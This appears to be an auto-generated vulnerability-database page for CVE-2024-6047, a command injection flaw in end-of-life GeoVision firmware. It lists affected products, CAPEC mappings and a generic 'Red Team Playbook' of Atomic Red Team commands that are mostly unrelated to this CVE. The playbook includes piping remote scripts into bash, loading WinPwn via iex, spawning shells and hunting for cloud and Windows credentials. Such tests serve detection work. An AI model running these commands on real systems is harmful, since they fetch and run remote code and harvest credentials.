CVE-2024-6047
Overview
This vulnerability is a command injection flaw rooted in improper input validation within certain GeoVision EOL device firmware components. The affected functionality fails to sanitize user-supplied input, allowing malicious data to be interpreted as system commands. The flaw resides in the input handling mechanism of the GeoVision GV_DSP_LPR_V2 and related firmware versions, enabling unauthorized command execution at the system level.
Vulnerability Description
Certain EOL GeoVision devices fail to properly filter user input for the specific functionality. Unauthenticated remote attackers can exploit this vulnerability to inject and execute arbitrary system commands on the device.
Impact
An unauthenticated attacker can exploit this vulnerability to execute arbitrary system commands remotely on affected GeoVision devices, gaining full control over the device. This includes the ability to manipulate device configurations, access sensitive data, disrupt device operation, and potentially pivot within the network. No authentication or user interaction is required, which significantly lowers the barrier for exploitation and increases the risk of widespread compromise in environments using these devices.
Solution
GeoVision has released security advisories addressing this issue for affected firmware versions of GV_DSP_LPR_V2 and related products. Users should apply the firmware updates provided in the official advisories published by TW-CERT (references: https://www.twcert.org.tw/tw/cp-132-7883-f5635-1.html and https://www.twcert.org.tw/en/cp-139-7884-c5a8b-2.html). These updates include input validation fixes to mitigate command injection. Administrators are advised to follow the vendor’s patch instructions precisely and verify device firmware versions to ensure remediation.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability affecting certain end-of-life GeoVision devices stems from inadequate input validation, allowing unauthenticated remote attackers to inject and execute arbitrary system commands. This flaw arises from the devices' failure to properly sanitize user inputs, which can lead to command injection attacks. Attackers can exploit this weakness by crafting malicious input that the system processes as legitimate commands, thereby gaining unauthorized access to the device's underlying operating system. The severity of this vulnerability is underscored by its high CVSS score, indicating a critical risk to the integrity and confidentiality of the affected systems.
Exploitation of this vulnerability can occur through various attack vectors, primarily targeting network interfaces exposed to the internet. An attacker could leverage social engineering tactics to lure users into interacting with a malicious link or directly probe the device for vulnerabilities. Once the attacker successfully injects commands, they can manipulate the device to perform unauthorized actions, such as altering configurations, accessing sensitive data, or even using the device as a foothold for further attacks within the network. This scenario highlights the ease with which attackers can compromise devices that lack robust security measures, particularly those that are no longer supported or updated.
The real-world impact of this vulnerability is significant, especially for organizations relying on these devices for critical operations. Compromised devices could lead to unauthorized surveillance, data breaches, or disruptions in service. The potential for attackers to gain control over video surveillance systems poses a direct threat to physical security, as malicious actors could manipulate camera feeds or disable recording capabilities. Furthermore, the financial implications of such breaches can be substantial, encompassing costs related to incident response, legal liabilities, and reputational damage. Businesses must recognize that the risks associated with using outdated technology extend beyond mere operational concerns; they can have far-reaching consequences for customer trust and regulatory compliance.
To effectively detect and mitigate this vulnerability, organizations should adopt a multi-layered security approach. Regular security assessments and penetration testing can help identify and address vulnerabilities before they are exploited. Implementing network segmentation can limit the exposure of vulnerable devices, reducing the risk of unauthorized access. Additionally, organizations should prioritize the replacement of end-of-life devices with newer models that receive regular security updates and patches. For those unable to replace devices immediately, applying strict access controls and monitoring network traffic for unusual activity can serve as interim measures to mitigate the risk.
In conclusion, the vulnerability present in certain GeoVision devices illustrates the critical need for robust security practices in the management of networked devices. The combination of inadequate input validation and the potential for remote exploitation poses a serious threat to organizations that rely on these systems. By understanding the technical details, potential attack vectors, and real-world implications, businesses can better prepare themselves against such vulnerabilities. Proactive detection and mitigation strategies are essential to safeguard against the exploitation of outdated technology and to maintain the integrity of organizational security.
Affected Products (20)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Geovision | Gv-Dsp Lpr Firmware | N/A |
cpe:2.3:o:geovision:gv-dsp_lpr_firmware:-:*:*:*:*:*:*:*
|
|
|
Geovision | Gv-Bx130 Firmware | N/A |
cpe:2.3:o:geovision:gv-bx130_firmware:-:*:*:*:*:*:*:*
|
|
|
Geovision | Gv-Bx1500 Firmware | N/A |
cpe:2.3:o:geovision:gv-bx1500_firmware:-:*:*:*:*:*:*:*
|
|
|
Geovision | Gv-Cb220 Firmware | N/A |
cpe:2.3:o:geovision:gv-cb220_firmware:-:*:*:*:*:*:*:*
|
|
|
Geovision | Gv-Ebl1100 Firmware | N/A |
cpe:2.3:o:geovision:gv-ebl1100_firmware:-:*:*:*:*:*:*:*
|
|
|
Geovision | Gv-Efd1100 Firmware | N/A |
cpe:2.3:o:geovision:gv-efd1100_firmware:-:*:*:*:*:*:*:*
|
|
|
Geovision | Gv-Fd2410 Firmware | N/A |
cpe:2.3:o:geovision:gv-fd2410_firmware:-:*:*:*:*:*:*:*
|
|
|
Geovision | Gv-Fd3400 Firmware | N/A |
cpe:2.3:o:geovision:gv-fd3400_firmware:-:*:*:*:*:*:*:*
|
|
|
Geovision | Gv-Fe3401 Firmware | N/A |
cpe:2.3:o:geovision:gv-fe3401_firmware:-:*:*:*:*:*:*:*
|
|
|
Geovision | Gv-Fe420 Firmware | N/A |
cpe:2.3:o:geovision:gv-fe420_firmware:-:*:*:*:*:*:*:*
|
|
|
Geovision | Gv-Gm8186 Vs14 Firmware | N/A |
cpe:2.3:o:geovision:gv-gm8186_vs14_firmware:-:*:*:*:*:*:*:*
|
|
|
Geovision | Gv-Vs14 Firmware | N/A |
cpe:2.3:o:geovision:gv-vs14_firmware:-:*:*:*:*:*:*:*
|
|
|
Geovision | Gv-Vs03 Firmware | N/A |
cpe:2.3:o:geovision:gv-vs03_firmware:-:*:*:*:*:*:*:*
|
|
|
Geovision | Gv-Vs2410 Firmware | N/A |
cpe:2.3:o:geovision:gv-vs2410_firmware:-:*:*:*:*:*:*:*
|
|
|
Geovision | Gv-Vs21600 Firmware | N/A |
cpe:2.3:o:geovision:gv-vs21600_firmware:-:*:*:*:*:*:*:*
|
|
|
Geovision | Gv-Vs04a Firmware | N/A |
cpe:2.3:o:geovision:gv-vs04a_firmware:-:*:*:*:*:*:*:*
|
|
|
Geovision | Gv-Vs04h Firmware | N/A |
cpe:2.3:o:geovision:gv-vs04h_firmware:-:*:*:*:*:*:*:*
|
|
|
Geovision | Gvlx 4 Firmware | N/A |
cpe:2.3:o:geovision:gvlx_4_firmware:-:*:*:*:*:*:*:*
|
|
|
Geovision | Gv-Vs2800 Firmware | N/A |
cpe:2.3:o:geovision:gv-vs2800_firmware:-:*:*:*:*:*:*:*
|
|
|
Geovision | Gv-Vs2820 Firmware | N/A |
cpe:2.3:o:geovision:gv-vs2820_firmware:-:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
3 eventsSighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
55%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
51%
|
Medium | High | |
| CAPEC-6 | Argument Injection |
48%
|
High | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-6047 |
| twcert.org.tw |
GitHub CVE
third-party-advisory
|
https://www.twcert.org.tw/tw/cp-132-7883-f5635-1.html |
| twcert.org.tw |
GitHub CVE
third-party-advisory
|
https://www.twcert.org.tw/en/cp-139-7884-c5a8b-2.html |
| akamai.com |
NVD API
Exploit
Third Party Advisory
|
https://www.akamai.com/blog/security-research/active-exploitation-mirai-geovision-iot-botnet |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-6047 |